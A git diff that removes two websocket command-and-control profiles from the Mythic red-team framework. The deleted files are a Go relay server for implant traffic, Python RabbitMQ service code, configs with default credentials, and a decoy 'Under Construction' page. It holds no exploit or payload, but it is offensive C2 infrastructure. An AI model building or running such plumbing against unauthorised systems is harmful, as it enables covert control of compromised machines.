{ - log.Println("Error opening config file ", err.Error()) - os.Exit(-1) - } - - config, _ := ioutil.ReadAll(cf) - - c2config := servers.C2Config{} - err = json.Unmarshal(config, &c2config) - if err != nil { - log.Println("Error in unmarshal call for config ", err.Error()) - os.Exit(-1) - } - - // start the server instance with the config - c2server := servers.NewInstance().(servers.Server) - - c2server.Run(c2config) - -} diff --git a/C2_Profiles/leviathan-websocket/c2_code/src/pkg/servers/server.go b/C2_Profiles/leviathan-websocket/c2_code/src/pkg/servers/server.go deleted file mode 100644 index 6e7fbc321..000000000 --- a/C2_Profiles/leviathan-websocket/c2_code/src/pkg/servers/server.go +++ /dev/null @@ -1,34 +0,0 @@ -package servers - -// C2Config - struct for server configuration -type C2Config struct { - BindAddress string `json:"bindaddress"` - SocketURI string `json:"websocketuri"` - SSLKey string `json:"sslkey"` - SSLCert string `json:"sslcert"` - UseSSL bool `json:"usessl"` - Defaultpage string `json:"defaultpage"` - Logfile string `json:"logfile"` - Debug bool `json:"debug"` -} - -//Server - interface used for all c2 profiles -type Server interface { - ApfellBaseURL() string - SetApfellBaseURL(url string) - PostResponse(taskid string, output []byte) []byte - PostMessage(msg []byte) []byte - GetNextTask(apfellID string) []byte - Run(cf interface{}) -} - -//Message - struct definition for messages between clients and the server -type Message struct { - Tag string `json:"tag"` - Client bool `json:"client"` - Data string `json:"data"` -} - -func NewInstance() interface{} { - return newServer() -} diff --git a/C2_Profiles/leviathan-websocket/c2_code/src/pkg/servers/websocket.go b/C2_Profiles/leviathan-websocket/c2_code/src/pkg/servers/websocket.go deleted file mode 100644 index 09abbf8e5..000000000 --- a/C2_Profiles/leviathan-websocket/c2_code/src/pkg/servers/websocket.go +++ /dev/null @@ -1,298 +0,0 @@ -// +build websocket - -package servers - -import ( - "bytes" - "crypto/tls" - "fmt" - "io/ioutil" - "log" - "net/http" - "os" - "strings" - - "github.com/gorilla/websocket" - "github.com/kabukky/httpscerts" -) - -type WebsocketC2 struct { - BaseURL string - BindAddress string - SSL bool - SocketURI string - Defaultpage string - Logfile string - Debug bool -} - -var upgrader = websocket.Upgrader{} - -func newServer() Server { - return &WebsocketC2{} -} - -func (s *WebsocketC2) SetBindAddress(addr string) { - s.BindAddress = addr -} - -//ApfellBaseURL - Returns the base url for apfell -func (s WebsocketC2) ApfellBaseURL() string { - return s.BaseURL -} - -//SetApfellBaseURL - Sets the base url for apfell -func (s *WebsocketC2) SetApfellBaseURL(url string) { - s.BaseURL = url -} - -//SetSocketURI - Set socket uri -func (s *WebsocketC2) SetSocketURI(uri string) { - s.SocketURI = uri -} - -func (s *WebsocketC2) PostMessage(msg []byte) []byte { - return s.htmlPostData("", msg) -} - -func (s WebsocketC2) GetNextTask(apfellID string) []byte { - //place holder - //url := fmt.Sprintf("%sapi/v%s/agent_message", s.ApfellBaseURL(), ApiVersion) - return make([]byte, 0) -} - -func (s WebsocketC2) PostResponse(taskid string, output []byte) []byte { - //urlEnding := fmt.Sprintf("api/v%s/agent_message", ApiVersion) - return output -} - -//postRESTResponse - Wrapper to post task responses through the Apfell rest API -func (s *WebsocketC2) postRESTResponse(urlEnding string, data []byte) []byte { - return make([]byte, 0) -} - -//htmlPostData HTTP POST function -func (s *WebsocketC2) htmlPostData(urlEnding string, sendData []byte) []byte { - url := s.ApfellBaseURL() - //log.Println("Sending POST request to url: ", url) - s.Websocketlog(fmt.Sprintln("Sending POST request to: ", url)) - - req, _ := http.NewRequest("POST", url, bytes.NewBuffer(sendData)) - contentLength := len(sendData) - req.ContentLength = int64(contentLength) - tr := &http.Transport{ - TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, - } - client := &http.Client{Transport: tr} - resp, err := client.Do(req) - - if err != nil { - s.Websocketlog(fmt.Sprintf("Error sending POST request: %s", err.Error())) - return make([]byte, 0) - } - - if resp.StatusCode != 200 { - s.Websocketlog(fmt.Sprintf("Did not receive 200 response code: %d", resp.StatusCode)) - return make([]byte, 0) - } - - defer resp.Body.Close() - - body, err := ioutil.ReadAll(resp.Body) - - if err != nil { - s.Websocketlog(fmt.Sprintf("Error reading response body: %s", err.Error())) - return make([]byte, 0) - } - - return body -} - -//htmlGetData - HTTP GET request for data -func (s *WebsocketC2) htmlGetData(url string) []byte { - //log.Println("Sending HTML GET request to url: ", url) - tr := &http.Transport{ - TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, - } - client := &http.Client{Transport: tr} - var respBody []byte - - req, err := http.NewRequest("GET", url, nil) - if err != nil { - s.Websocketlog(fmt.Sprintf("Error creating http request: %s", err.Error())) - return make([]byte, 0) - } - - resp, err := client.Do(req) - - if err != nil { - s.Websocketlog(fmt.Sprintf("Error completing GET request: %s", err.Error())) - return make([]byte, 0) - } - - if resp.StatusCode != 200 { - s.Websocketlog(fmt.Sprintf("Did not receive 200 response code: %d", resp.StatusCode)) - return make([]byte, 0) - } - - defer resp.Body.Close() - - respBody, _ = ioutil.ReadAll(resp.Body) - - return respBody - -} - -func (s *WebsocketC2) SetDebug(debug bool) { - s.Debug = debug -} - -//GetDefaultPage - Get the default html page -func (s WebsocketC2) GetDefaultPage() string { - return s.Defaultpage -} - -//SetDefaultPage - Set the default html page -func (s *WebsocketC2) SetDefaultPage(newpage string) { - s.Defaultpage = newpage -} - -//SocketHandler - Websockets handler -func (s WebsocketC2) SocketHandler(w http.ResponseWriter, r *http.Request) { - //Upgrade the websocket connection - upgrader.CheckOrigin = func(r *http.Request) bool { return true } - conn, err := upgrader.Upgrade(w, r, nil) - if err != nil { - s.Websocketlog(fmt.Sprintf("Websocket upgrade failed: %s\n", err.Error())) - http.Error(w, "websocket connection failed", http.StatusBadRequest) - return - } - - s.Websocketlog("Received new websocket client") - - go s.manageClient(conn) - -} - -func (s *WebsocketC2) manageClient(c *websocket.Conn) { - -LOOP: - for { - // Wait for the client to send the initial checkin message - m := Message{} - err := c.ReadJSON(&m) - - if err != nil { - s.Websocketlog(fmt.Sprintf("Read error %s. Exiting session", err.Error())) - return - } - - var resp []byte - if m.Client { - s.Websocketlog(fmt.Sprintf("Received agent message %+v\n", m)) - resp = s.PostMessage([]byte(m.Data)) - } - - reply := Message{Client: false} - - if len(resp) == 0 { - reply.Data = string(make([]byte, 1)) - } else { - reply.Data = string(resp) - } - - reply.Tag = m.Tag - - if err = c.WriteJSON(reply); err != nil { - s.Websocketlog(fmt.Sprintf("Error writing json to client %s", err.Error())) - break LOOP - } - - } - - c.Close() - -} - -//ServeDefaultPage - HTTP handler -func (s WebsocketC2) ServeDefaultPage(w http.ResponseWriter, r *http.Request) { - log.Println("Received request: ", r.URL) - log.Println("URI Path ", r.URL.Path) - if (r.URL.Path == "/" || r.URL.Path == "/index.html") && r.Method == "GET" { - // Serve the default page if we receive a GET request at the base URI - http.ServeFile(w, r, s.GetDefaultPage()) - } - - http.Error(w, "Not Found", http.StatusNotFound) - return -} -//Run - main function for the websocket profile -func (s WebsocketC2) Run(config interface{}) { - cf := config.(C2Config) - s.Debug = cf.Debug - s.SetDefaultPage(cf.Defaultpage) - s.SetApfellBaseURL(os.Getenv("MYTHIC_ADDRESS")) - s.SetBindAddress(cf.BindAddress) - s.SetSocketURI(cf.SocketURI) - - // Handle requests to the base uri - http.HandleFunc("/", s.ServeDefaultPage) - // Handle requests to the websockets uri - http.HandleFunc(fmt.Sprintf("/%s", s.SocketURI), s.SocketHandler) - - // Setup all of the options according to the configuration - if !strings.Contains(cf.SSLKey, "") && !strings.Contains(cf.SSLCert, "") { - - // copy the key and cert to the local directory - keyfile, err := ioutil.ReadFile(cf.SSLKey) - if err != nil { - log.Println("Unable to read key file ", err.Error()) - } - - err = ioutil.WriteFile("key.pem", keyfile, 0644) - if err != nil { - log.Println("Unable to write key file ", err.Error()) - } - - certfile, err := ioutil.ReadFile(cf.SSLCert) - if err != nil { - log.Println("Unable to read cert file ", err.Error()) - } - - err = ioutil.WriteFile("cert.pem", certfile, 0644) - if err != nil { - log.Println("Unable to write cert file ", err.Error()) - } - } - - if cf.UseSSL { - err := httpscerts.Check("cert.pem", "key.pem") - if err != nil { - s.Websocketlog(fmt.Sprintf("Error for cert.pem or key.pem %s", err.Error())) - err = httpscerts.Generate("cert.pem", "key.pem", cf.BindAddress) - if err != nil { - log.Fatal("Error generating https cert") - os.Exit(1) - } - } - - s.Websocketlog(fmt.Sprintf("Starting SSL server at https://%s and wss://%s", cf.BindAddress, cf.BindAddress)) - err = http.ListenAndServeTLS(cf.BindAddress, "cert.pem", "key.pem", nil) - if err != nil { - log.Fatal("Failed to start raven server: ", err) - } - } else { - s.Websocketlog(fmt.Sprintf("Starting server at http://%s and ws://%s", cf.BindAddress, cf.BindAddress)) - err := http.ListenAndServe(cf.BindAddress, nil) - if err != nil { - log.Fatal("Failed to start raven server: ", err) - } - } -} - -//Websocketlog - logging function -func (s WebsocketC2) Websocketlog(msg string) { - if s.Debug { - log.Println(msg) - } -} diff --git a/C2_Profiles/leviathan-websocket/mythic/C2ProfileBase.py b/C2_Profiles/leviathan-websocket/mythic/C2ProfileBase.py deleted file mode 100644 index 313cdf49f..000000000 --- a/C2_Profiles/leviathan-websocket/mythic/C2ProfileBase.py +++ /dev/null @@ -1,130 +0,0 @@ -from enum import Enum -from abc import abstractmethod -import json - - -class ParameterType(Enum): - String = "String" - ChooseOne = "ChooseOne" - Array = "Array" - Date = "Date" - Dictionary = "Dictionary" - - -class C2ProfileParameter: - def __init__( - self, - name: str, - description: str, - default_value: str = "", - randomize: bool = False, - format_string: str = "", - parameter_type: ParameterType = ParameterType.String, - required: bool = True, - verifier_regex: str = "", - choices: [str] = None, - ): - self.name = name - self.description = description - self.randomize = randomize - self.format_string = format_string - self.parameter_type = parameter_type - self.required = required - self.verifier_regex = verifier_regex - self.choices = choices - self.default_value = "" - if self.parameter_type == ParameterType.ChooseOne and choices is not None: - self.default_value = "\n".join(choices) - else: - self.default_value = default_value - - - def to_json(self): - return { - "name": self.name, - "description": self.description, - "default_value": self.default_value if self.parameter_type not in [ParameterType.Array, ParameterType.Dictionary] else json.dumps(self.default_value), - "randomize": self.randomize, - "format_string": self.format_string, - "required": self.required, - "parameter_type": self.parameter_type.value, - "verifier_regex": self.verifier_regex, - } - - -class C2Profile: - @property - @abstractmethod - def name(self): - pass - - @property - @abstractmethod - def description(self): - pass - - @property - @abstractmethod - def author(self): - pass - - @property - @abstractmethod - def is_p2p(self): - pass - - @property - @abstractmethod - def is_server_routed(self): - pass - - @property - @abstractmethod - def mythic_encrypts(self): - pass - - @property - @abstractmethod - def parameters(self): - pass - - def to_json(self): - return { - "name": self.name, - "description": self.description, - "author": self.author, - "mythic_encrypts": self.mythic_encrypts, - "is_p2p": self.is_p2p, - "is_server_routed": self.is_server_routed, - "params": [x.to_json() for x in self.parameters], - } - - -class RPCStatus(Enum): - Success = "success" - Error = "error" - - -class RPCResponse: - def __init__(self, status: RPCStatus = None, response: str = None): - self.status = status - self.response = response - - @property - def status(self): - return self._status - - @status.setter - def status(self, status): - self._status = status - - @property - def response(self): - return self._response - - @response.setter - def response(self, response): - self._response = response - - def to_json(self): - return {"status": self.status.value, "response": self.response} diff --git a/C2_Profiles/leviathan-websocket/mythic/MythicBaseRPC.py b/C2_Profiles/leviathan-websocket/mythic/MythicBaseRPC.py deleted file mode 100644 index e190491ac..000000000 --- a/C2_Profiles/leviathan-websocket/mythic/MythicBaseRPC.py +++ /dev/null @@ -1,99 +0,0 @@ -from aio_pika import connect_robust, IncomingMessage, Message -import asyncio -import uuid -import json -from enum import Enum - - -class MythicStatus(Enum): - Success = "success" - Error = "error" - - -class RPCResponse: - def __init__(self, resp: dict): - self._raw_resp = resp - if resp["status"] == "success": - self.status = MythicStatus.Success - self.response = resp["response"] if "response" in resp else "" - self.error_message = None - else: - self.status = MythicStatus.Error - self.error_message = resp["error"] - self.response = None - - @property - def status(self): - return self._status - - @status.setter - def status(self, status): - self._status = status - - @property - def error_message(self): - return self._error_message - - @error_message.setter - def error_message(self, error_message): - self._error_message = error_message - - @property - def response(self): - return self._response - - @response.setter - def response(self, response): - self._response = response - - -class MythicBaseRPC: - def __init__(self): - self.connection = None - self.channel = None - self.callback_queue = None - self.futures = {} - self.loop = asyncio.get_event_loop() - - async def connect(self): - config_file = open("/Mythic/mythic/rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - self.connection = await connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - self.channel = await self.connection.channel() - self.callback_queue = await self.channel.declare_queue(exclusive=True) - await self.callback_queue.consume(self.on_response) - - return self - - def on_response(self, message: IncomingMessage): - future = self.futures.pop(message.correlation_id) - future.set_result(message.body) - - async def call(self, n, receiver: str = None) -> RPCResponse: - if self.connection is None: - await self.connect() - correlation_id = str(uuid.uuid4()) - future = self.loop.create_future() - - self.futures[correlation_id] = future - if receiver is None: - router = "c2rpc_queue" - else: - router = "{}_rpc_queue".format(receiver) - await self.channel.default_exchange.publish( - Message( - json.dumps(n).encode(), - content_type="application/json", - correlation_id=correlation_id, - reply_to=self.callback_queue.name, - ), - routing_key=router, - ) - - return RPCResponse(json.loads(await future)) diff --git a/C2_Profiles/leviathan-websocket/mythic/MythicCallbackRPC.py b/C2_Profiles/leviathan-websocket/mythic/MythicCallbackRPC.py deleted file mode 100644 index 002a8038c..000000000 --- a/C2_Profiles/leviathan-websocket/mythic/MythicCallbackRPC.py +++ /dev/null @@ -1,124 +0,0 @@ -from MythicBaseRPC import * -import base64 - - -class MythicRPCResponse(RPCResponse): - def __init__(self, resp: RPCResponse): - super().__init__(resp._raw_resp) - if resp.status == MythicStatus.Success: - self.data = resp.response - else: - self.data = None - - @property - def data(self): - return self._data - - @data.setter - def data(self, data): - self._data = data - - -class MythicCallbackRPC(MythicBaseRPC): - # returns dictionary of `{"raw": raw_tasking, "encrypted": base64(uuid+encrypted_tasking)}` - async def get_tasking( - self, uuid: str, tasking_size: int = 1 - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "get_tasking", - "uuid": uuid, - "tasking_size": tasking_size, - } - ) - return MythicRPCResponse(resp) - - async def add_route( - self, - source_uuid: str, - destination_uuid: str, - direction: int = 1, - metadata: str = None, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "add_route", - "source": source_uuid, - "destination": destination_uuid, - "direction": direction, - "metadata": metadata, - } - ) - return MythicRPCResponse(resp) - - async def remove_route( - self, - source_uuid: str, - destination_uuid: str, - direction: int = 1, - metadata: str = None, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "remove_route", - "source": source_uuid, - "destination": destination_uuid, - "direction": direction, - "metadata": metadata, - } - ) - return MythicRPCResponse(resp) - - async def get_callback_info(self, uuid: str) -> MythicRPCResponse: - resp = await self.call({"action": "get_callback_info", "uuid": uuid}) - return MythicRPCResponse(resp) - - async def get_encryption_data(self, uuid: str, profile: str) -> MythicRPCResponse: - resp = await self.call( - { - "action": "get_encryption_data", - "uuid": uuid, - "c2_profile": profile, - } - ) - return MythicRPCResponse(resp) - - async def update_callback_info(self, uuid: str, info: dict) -> MythicRPCResponse: - resp = await self.call( - {"action": "update_callback_info", "uuid": uuid, "data": info} - ) - return MythicRPCResponse(resp) - - async def add_event_message( - self, message: str, level: str = "info" - ) -> MythicRPCResponse: - resp = await self.call( - {"action": "add_event_message", "level": level, "message": message} - ) - return MythicRPCResponse(resp) - - async def encrypt_bytes( - self, data: bytes, uuid: str, with_uuid: bool = False, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "encrypt_bytes", - "data": base64.b64encode(data).decode(), - "uuid": uuid, - "with_uuid": with_uuid, - } - ) - return MythicRPCResponse(resp) - - async def decrypt_bytes( - self, data: bytes, uuid: str, with_uuid: bool = False, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "decrypt_bytes", - "uuid": uuid, - "data": base64.b64encode(data).decode(), - "with_uuid": with_uuid, - } - ) - return MythicRPCResponse(resp) diff --git a/C2_Profiles/leviathan-websocket/mythic/__init__.py b/C2_Profiles/leviathan-websocket/mythic/__init__.py deleted file mode 100644 index e69de29bb..000000000 diff --git a/C2_Profiles/leviathan-websocket/mythic/c2_functions/C2_RPC_functions.py b/C2_Profiles/leviathan-websocket/mythic/c2_functions/C2_RPC_functions.py deleted file mode 100644 index 6332e7fc2..000000000 --- a/C2_Profiles/leviathan-websocket/mythic/c2_functions/C2_RPC_functions.py +++ /dev/null @@ -1,11 +0,0 @@ -from C2ProfileBase import * -import MythicCallbackRPC - -# request is a dictionary: {"action": func_name, "message": "the input", "task_id": task id num} -# must return an RPCResponse() object and set .status to an instance of RPCStatus and response to str of message -async def test(request): - response = RPCResponse() - response.status = RPCStatus.Success - response.response = "hello" - #resp = await MythicCallbackRPC.MythicCallbackRPC().add_event_message(message="got a POST message") - return response \ No newline at end of file diff --git a/C2_Profiles/leviathan-websocket/mythic/c2_functions/__init__.py b/C2_Profiles/leviathan-websocket/mythic/c2_functions/__init__.py deleted file mode 100644 index e69de29bb..000000000 diff --git a/C2_Profiles/leviathan-websocket/mythic/c2_functions/websocket.py b/C2_Profiles/leviathan-websocket/mythic/c2_functions/websocket.py deleted file mode 100644 index 4bf28c8c6..000000000 --- a/C2_Profiles/leviathan-websocket/mythic/c2_functions/websocket.py +++ /dev/null @@ -1,38 +0,0 @@ -from C2ProfileBase import * - - -class Websocket(C2Profile): - name = "leviathan-websocket" - description = "Websocket C2 Server for Leviathan" - author = "@xorrior" - is_p2p = False - is_server_routed = False - mythic_encrypts = True - parameters = [ - C2ProfileParameter( - name="callback_host", - description="Callback Host", - default_value="ws://127.0.0.1", - verifier_regex="^(ws|wss)://[a-zA-Z0-9]+", - ), - C2ProfileParameter( - name="callback_interval", - description="Callback Interval in seconds", - default_value="10", - verifier_regex="^[0-9]+$", - required=False, - ), - C2ProfileParameter( - name="ENDPOINT_REPLACE", - description="Websockets Endpoint", - default_value="socket", - required=False, - ), - C2ProfileParameter( - name="callback_port", - description="Callback Port", - default_value="8081", - verifier_regex="^[0-9]+$", - required=False, - ), - ] diff --git a/C2_Profiles/leviathan-websocket/mythic/c2_service.sh b/C2_Profiles/leviathan-websocket/mythic/c2_service.sh deleted file mode 100755 index 00627848a..000000000 --- a/C2_Profiles/leviathan-websocket/mythic/c2_service.sh +++ /dev/null @@ -1,7 +0,0 @@ -#!/bin/bash - -cd /Mythic/mythic - -export PYTHONPATH=/Mythic:/Mythic/mythic - -python3.8 mythic_service.py diff --git a/C2_Profiles/leviathan-websocket/mythic/mythic_service.py b/C2_Profiles/leviathan-websocket/mythic/mythic_service.py deleted file mode 100755 index dde56b77c..000000000 --- a/C2_Profiles/leviathan-websocket/mythic/mythic_service.py +++ /dev/null @@ -1,410 +0,0 @@ -#!/usr/bin/env python3 -import aio_pika -import os -import time -import sys -import subprocess -import _thread -import base64 -import json -import socket -import asyncio -import pathlib -import traceback -from C2ProfileBase import * -from importlib import import_module, invalidate_caches -from functools import partial - -credentials = None -connection_params = None -running = False -process = None -thread = None -hostname = "" -output = "" -exchange = None -container_files_path = None - - -def deal_with_stdout(): - global process - global output - while True: - try: - for line in iter(process.stdout.readline, b""): - output += line.decode("utf-8") - except Exception as e: - print("Exiting thread due to: {}\n".format(str(e))) - sys.stdout.flush() - break - - -def import_all_c2_functions(): - import glob - - # Get file paths of all modules. - modules = glob.glob("c2_functions/*.py") - invalidate_caches() - for x in modules: - if not x.endswith("__init__.py") and x[-3:] == ".py": - module = import_module("c2_functions." + pathlib.Path(x).stem, package=None) - for el in dir(module): - if "__" not in el: - globals()[el] = getattr(module, el) - - -async def send_status(message="", routing_key=""): - global exchange - try: - message_body = aio_pika.Message(message.encode()) - await exchange.publish(message_body, routing_key=routing_key) - except Exception as e: - print("Exception in send_status: {}".format(str(e))) - sys.stdout.flush() - - -async def callback(message: aio_pika.IncomingMessage): - global running - global process - global output - global thread - global hostname - global container_files_path - with message.process(): - # messages of the form: c2.modify.PROFILE NAME.command - try: - command = message.routing_key.split(".")[3] - username = message.routing_key.split(".")[4] - server_path = container_files_path / "server" - # command = body.decode('utf-8') - if command == "start": - if not running: - # make sure to start the /Apfell/server in the background - os.chmod(server_path, mode=0o777) - output = "" - process = subprocess.Popen( - str(server_path), - stdout=subprocess.PIPE, - stderr=subprocess.STDOUT, - cwd=str(container_files_path), - ) - thread = _thread.start_new_thread(deal_with_stdout, ()) - time.sleep(3) - process.poll() - if process.returncode is not None: - # this means something went wrong and the process is dead - running = False - await send_status( - message="Failed to start\nOutput: {}".format(output), - routing_key="c2.status.{}.stopped.start.{}".format( - hostname, username - ), - ) - output = "" - else: - running = True - await send_status( - message="Started with pid: {}...\nOutput: {}".format( - str(process.pid), output - ), - routing_key="c2.status.{}.running.start.{}".format( - hostname, username - ), - ) - output = "" - else: - await send_status( - message="Already running...\nOutput: {}".format(output), - routing_key="c2.status.{}.running.start.{}".format( - hostname, username - ), - ) - output = "" - elif command == "stop": - if running: - try: - process.kill() - process.communicate() - except Exception as e: - pass - try: - thread.exit() - except Exception as e: - pass - running = False - await send_status( - message="Process killed...\nOld Output: {}".format(output), - routing_key="c2.status.{}.stopped.stop.{}".format( - hostname, username - ), - ) - output = "" - else: - await send_status( - message="Process not running...\nOld Output: {}".format(output), - routing_key="c2.status.{}.stopped.stop.{}".format( - hostname, username - ), - ) - output = "" - # make sure to stop the /Apfell/server in the background - elif command == "status": - if running: - await send_status( - message="Output: {}".format(output), - routing_key="c2.status.{}.running.status.{}".format( - hostname, username - ), - ) - output = "" - else: - await send_status( - message="C2 is not running", - routing_key="c2.status.{}.stopped.status.{}".format( - hostname, username - ), - ) - elif command == "get_config": - try: - path = container_files_path / "config.json" - file_data = open(path, "rb").read() - except Exception as e: - file_data = b"File not found" - encoded_data = json.dumps( - { - "filename": "config.json", - "data": base64.b64encode(file_data).decode("utf-8"), - } - ) - await send_status( - message=encoded_data, - routing_key="c2.status.{}.{}.get_config.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - elif command == "writefile": - try: - message = json.loads(message.body.decode("utf-8")) - file_path = container_files_path / message["file_path"] - file_path = file_path.resolve() - if container_files_path not in file_path.parents: - response = { - "status": "error", - "error": "trying to break out of path", - } - else: - file = open(file_path, "wb") - file.write(base64.b64decode(message["data"])) - file.close() - response = {"status": "success", "file": message["file_path"]} - except Exception as e: - response = {"status": "error", "error": str(e)} - await send_status( - message=json.dumps(response), - routing_key="c2.status.{}.{}.writefile.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - elif command == "sync_classes": - try: - import_all_c2_functions() - # c2profile = {} - for cls in C2Profile.__subclasses__(): - c2profile = cls().to_json() - break - await send_status( - message=json.dumps(c2profile), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - except Exception as e: - await send_status( - message='{"message": "Error while syncing info: {}"}'.format( - str(traceback.format_exc()) - ), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - else: - print("Unknown command: {}".format(command)) - sys.stdout.flush() - except Exception as e: - print("Failed overall message processing: " + str(e)) - sys.stdout.flush() - - -async def sync_classes(): - try: - import_all_c2_functions() - c2profile = {} - for cls in C2Profile.__subclasses__(): - c2profile = cls().to_json() - break - await send_status( - message=json.dumps(c2profile), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "stopped", "" - ), - ) - except Exception as e: - await send_status( - message='{"message": "Error while syncing info: {}"}'.format( - str(traceback.format_exc()) - ), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "stopped", "" - ), - ) - - -async def rabbit_c2_rpc_callback( - exchange: aio_pika.Exchange, message: aio_pika.IncomingMessage -): - with message.process(): - request = json.loads(message.body.decode()) - if "action" in request: - response = await globals()[request["action"]](request) - response = json.dumps(response.to_json()).encode() - else: - response = json.dumps( - {"status": "error", "error": "Missing action"} - ).encode() - try: - await exchange.publish( - aio_pika.Message(body=response, correlation_id=message.correlation_id), - routing_key=message.reply_to, - ) - except Exception as e: - print( - "Exception trying to send message back to container for rpc! " + str(e) - ) - sys.stdout.flush() - - -async def connect_and_consume_rpc(): - connection = None - global hostname - while connection is None: - try: - connection = await aio_pika.connect_robust( - host="127.0.0.1", - login="mythic_user", - password="mythic_password", - virtualhost="mythic_vhost", - ) - channel = await connection.channel() - # get a random queue that only the apfell server will use to listen on to catch all heartbeats - queue = await channel.declare_queue("{}_rpc_queue".format(hostname)) - await channel.set_qos(prefetch_count=50) - try: - task = queue.consume( - partial(rabbit_c2_rpc_callback, channel.default_exchange) - ) - result = await asyncio.wait_for(task, None) - except Exception as e: - print("Exception in connect_and_consume .consume: {}".format(str(e))) - sys.stdout.flush() - except (ConnectionError, ConnectionRefusedError) as c: - print("Connection to rabbitmq failed, trying again...") - sys.stdout.flush() - except Exception as e: - print("Exception in connect_and_consume_rpc connect: {}".format(str(e))) - # print("Exception in connect_and_consume connect: {}".format(str(e))) - sys.stdout.flush() - await asyncio.sleep(2) - - -async def mythic_service(): - global hostname - global exchange - global container_files_path - connection = None - config_file = open("rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - if main_config["name"] == "hostname": - hostname = socket.gethostname() - else: - hostname = main_config["name"] - container_files_path = pathlib.Path( - os.path.abspath(main_config["container_files_path"]) - ) - container_files_path = container_files_path / "c2_code" - while connection is None: - try: - connection = await aio_pika.connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - except Exception as e: - await asyncio.sleep(2) - try: - channel = await connection.channel() - exchange = await channel.declare_exchange( - "mythic_traffic", aio_pika.ExchangeType.TOPIC - ) - queue = await channel.declare_queue("", exclusive=True) - await queue.bind( - exchange="mythic_traffic", routing_key="c2.modify.{}.#".format(hostname) - ) - # just want to handle one message at a time so we can clean up and be ready - await channel.set_qos(prefetch_count=30) - print("Listening for c2.modify.{}.#".format(hostname)) - sys.stdout.flush() - task = queue.consume(callback) - await sync_classes() - task4 = asyncio.ensure_future(connect_and_consume_rpc()) - result = await asyncio.gather(task, task4) - # send_status(message="", routing_key="c2.status.{}.stopped.stop".format(hostname)) - except Exception as e: - print(str(traceback.format_exc())) - sys.stdout.flush() - - -async def heartbeat_loop(): - config_file = open("rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - if main_config["name"] == "hostname": - hostname = socket.gethostname() - else: - hostname = main_config["name"] - while True: - try: - connection = await aio_pika.connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - channel = await connection.channel() - # declare our heartbeat exchange that everybody will publish to, but only the apfell server will are about - exchange = await channel.declare_exchange( - "mythic_traffic", aio_pika.ExchangeType.TOPIC - ) - except Exception as e: - print(str(e)) - await asyncio.sleep(2) - continue - while True: - try: - # routing key is ignored for fanout, it'll go to anybody that's listening, which will only be the server - await exchange.publish( - aio_pika.Message("heartbeat".encode()), - routing_key="c2.heartbeat.{}".format(hostname), - ) - await asyncio.sleep(10) - except Exception as e: - print(str(e)) - # if we get an exception here, break out to the bigger loop and try to connect again - break - -# start our service -loop = asyncio.get_event_loop() -loop.create_task(mythic_service()) -loop.create_task(heartbeat_loop()) -loop.run_forever() diff --git a/C2_Profiles/leviathan-websocket/mythic/rabbitmq_config.json b/C2_Profiles/leviathan-websocket/mythic/rabbitmq_config.json deleted file mode 100755 index 08581c01a..000000000 --- a/C2_Profiles/leviathan-websocket/mythic/rabbitmq_config.json +++ /dev/null @@ -1,8 +0,0 @@ -{ - "username": "mythic_user", - "password": "mythic_password", - "virtual_host": "mythic_vhost", - "host": "127.0.0.1", - "name": "hostname", - "container_files_path": "/Mythic/" -} \ No newline at end of file diff --git a/C2_Profiles/websocket/Dockerfile b/C2_Profiles/websocket/Dockerfile deleted file mode 100755 index beabdbb2f..000000000 --- a/C2_Profiles/websocket/Dockerfile +++ /dev/null @@ -1 +0,0 @@ -From itsafeaturemythic/python38_sanic_c2profile:0.0.1 diff --git a/C2_Profiles/websocket/c2_code/config.json b/C2_Profiles/websocket/c2_code/config.json deleted file mode 100755 index e61625ddd..000000000 --- a/C2_Profiles/websocket/c2_code/config.json +++ /dev/null @@ -1,10 +0,0 @@ -{ - "bindaddress": "0.0.0.0:8081", - "usessl": false, - "sslkey":"", - "sslcert":"", - "websocketuri": "socket", - "defaultpage": "index.html", - "logfile": "server.log", - "debug": false -} diff --git a/C2_Profiles/websocket/c2_code/index.html b/C2_Profiles/websocket/c2_code/index.html deleted file mode 100755 index 49f0e897f..000000000 --- a/C2_Profiles/websocket/c2_code/index.html +++ /dev/null @@ -1,9 +0,0 @@ - - - -Under Construction - - -

This page is under construction. Please come back soon!

